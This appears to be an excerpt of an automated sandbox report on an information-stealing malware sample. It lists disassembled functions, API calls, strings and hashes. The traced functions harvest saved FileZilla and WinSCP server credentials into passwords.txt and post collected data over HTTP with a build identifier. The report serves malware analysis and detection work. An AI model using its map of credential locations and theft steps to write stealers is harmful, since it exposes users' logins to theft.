                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d94445ed71f065b383326199e5ec8efcfc5097a635ab3f6e1771aae64ab80d7b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A442937291016D9ADF20FB29DC42ADDB7B8FF44304F0585E1A648B3222DA717F969F81
                                                                                                                                                                                                                                                                                                                    Function 008EF6CB Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 292stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 008EF77A
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,009179E7,009179D7,009179D6,009179D3), ref: 008EF7C0
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008EF7C7
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 008EF7DB
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EF7E6
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 008EF81A
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EF825
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 008EF853
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EF85E
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008EF88C
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EF897
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EF902
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EF916
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(008EFCF9), ref: 008EFA3E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcpy$File$AllocCreateHeapLocallstrcat$AllocateCloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                                                    • API String ID: 1004949264-935134978
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8d89f12325945b8f9f067ed7ddc0c8b5d12b2a9509a5a1fa8ddf82945cf97c71
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a972738219656d855fe8b2e84f77f8b4b6581b5ec6bd1a79aac0e730bf1fb44b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d89f12325945b8f9f067ed7ddc0c8b5d12b2a9509a5a1fa8ddf82945cf97c71
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1A11732A4011DABCB00BBB5EC4ADDE7B78FF05705F110461FB01F7162DA71AA568BA2
                                                                                                                                                                                                                                                                                                                    Function 008EF182 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1114 8ef182-8ef22d call 905490 * 4 RegOpenKeyExA 1123 8ef6b4-8ef6ca call 8e1cce call 8fe88c 1114->1123 1124 8ef233-8ef25e RegGetValueA 1114->1124 1125 8ef283-8ef289 1124->1125 1126 8ef260-8ef266 1124->1126 1125->1126 1129 8ef28b-8ef291 1125->1129 1126->1123 1128 8ef26c-8ef27e RegCloseKey 1126->1128 1128->1123 1131 8ef2a5-8ef2bd RegOpenKeyExA 1129->1131 1132 8ef293-8ef29f RegCloseKey 1129->1132 1131->1123 1134 8ef2c3-8ef2e4 RegEnumKeyExA 1131->1134 1132->1131 1134->1126 1136 8ef2ea-8ef2f5 call 8f2143 1134->1136 1138 8ef2fa-8ef3d9 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 RegGetValueA call 8f2265 call 8f21e9 call 8e2910 RegGetValueA 1136->1138 1157 8ef3db-8ef427 call 8f424c call 8f2223 call 8f21e9 call 8e2910 * 2 1138->1157 1158 8ef429-8ef450 call 8f2265 call 8f21e9 call 8e2910 1138->1158 1170 8ef455-8ef565 call 8f2265 call 8f21e9 call 8e2910 RegGetValueA call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 RegGetValueA call 8f2265 call 8f21e9 call 8e2910 StrCmpCA 1157->1170 1158->1170 1199 8ef5cd-8ef632 call 8f2265 call 8f21e9 call 8e2910 RegEnumKeyExA 1170->1199 1200 8ef567-8ef58c call 8eec8f 1170->1200 1199->1138 1214 8ef638-8ef694 call 8e1ced lstrlen call 8f2143 call 8f8be6 call 8e2910 1199->1214 1206 8ef58e 1200->1206 1207 8ef590-8ef5c7 call 8f2265 call 8f21e9 call 8e2910 call 8f045e 1200->1207 1206->1207 1207->1199 1228 8ef6a9-8ef6af call 8e2910 1214->1228 1229 8ef696-8ef6a2 RegCloseKey 1214->1229 1228->1123 1229->1228
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EF1B3
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EF1D3
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EF1E4
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EF1F5
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008EF229
                                                                                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 008EF25A
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008EF272
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008EF299
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008EF2B9
                                                                                                                                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 008EF2DC
                                                                                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,009179CA), ref: 008EF375
                                                                                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 008EF3D5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                                                                                                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                                                                                    • API String ID: 463713726-2798830873
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d8dbddc71117c6a32970a403406955f96084568a901e7e2c700a67e3ea936b27
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c54d8ec76ac7f122491987717a9cde87aa27c788015db4c6d9f1eddb557eecbf
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8dbddc71117c6a32970a403406955f96084568a901e7e2c700a67e3ea936b27
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DD1D87291012DAADB20EBA5DC42AEAB778FF44304F5144E7A608B3151DA707F85DF62
                                                                                                                                                                                                                                                                                                                    Function 008E5E61 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 469networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1231 8e5e61-8e5f26 call 8f2175 call 8e49de call 8f2143 * 5 InternetOpenA StrCmpCA 1246 8e5f2e-8e5f34 1231->1246 1247 8e5f28 1231->1247 1248 8e663e-8e6663 InternetCloseHandle call 8e91ff 1246->1248 1249 8e5f3a-8e60c4 call 8f38a6 call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f2223 call 8f21e9 call 8e2910 * 2 InternetConnectA 1246->1249 1247->1246 1254 8e6696-8e6718 call 8e2910 * 4 call 8e1cce call 8e2910 call 8fe88c 1248->1254 1255 8e6665-8e6691 call 8f21a5 call 8f2265 call 8f21e9 call 8e2910 1248->1255 1325 8e60ca-8e6108 HttpOpenRequestA 1249->1325 1326 8e6638 1249->1326 1255->1254 1327 8e610e-8e6114 1325->1327 1328 8e662c-8e6632 InternetCloseHandle 1325->1328 1326->1248 1329 8e6116-8e612c InternetSetOptionA 1327->1329 1330 8e6132-8e65c0 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 lstrlen * 2 GetProcessHeap RtlAllocateHeap lstrlen call 9088d0 lstrlen * 2 call 9088d0 lstrlen HttpSendRequestA 1327->1330 1328->1326 1329->1330 1473 8e6601-8e661e InternetReadFile 1330->1473 1474 8e65c2-8e65ca 1473->1474 1475 8e6620-8e6626 InternetCloseHandle 1473->1475 1474->1475 1476 8e65cc-8e65fc call 8f2265 call 8f21e9 call 8e2910 1474->1476 1475->1328 1476->1473
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E5F00
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008E5F1E
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E60B6
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 008E60FA
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,",mode,00918AA0,------,00918A94,635b5ceb8ed09951eb8d5e776815ad72,",build_id,00918A7C,------,00918A70,",00918A64,------), ref: 008E6529
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E6538
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E6542
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E6549
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E6556
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E6564
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E6572
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E6580
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E658D
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E65A2
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(?,?,00000000), ref: 008E65B5
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000000C7,?), ref: 008E6616
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6626
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6632
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6644
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E612C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocateConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                                                                                    • String ID: "$"$"$------$------$------$------$635b5ceb8ed09951eb8d5e776815ad72$build_id$mode
                                                                                                                                                                                                                                                                                                                    • API String ID: 3306106941-2638894007
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ed9c143fa08c47a85f9a0b72a81a9654b6e563f64055629ab998da3156b67be2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 329516204c2443359af1b7ff541c12f129e1ddcafc7720a55a2f52a49841f0ee
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed9c143fa08c47a85f9a0b72a81a9654b6e563f64055629ab998da3156b67be2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77228E3290016D9ACF60EB69DD42BDDB778FF05300F0185E2AA09B3162DA717F9A8F51
                                                                                                                                                                                                                                                                                                                    Function 008F58C3 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1482 8f58c3-8f62e2 call 8f2143 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f291c call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f3230 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f32e0 call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f25fe call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 GetCurrentProcessId call 8f3ee1 call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f278c call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f3463 call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f35f3 call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f28e1 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f28af call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f31bf call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2a37 call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f291c call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f298a call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2bad call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2c63 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2c16 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2d75 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2dee call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f3101 call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2e5f call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2e5f call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f21e9 call 8e2910 call 8e1ced lstrlen call 8f2143 call 8f8be6 call 8e2910 * 2 call 8e1cce
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
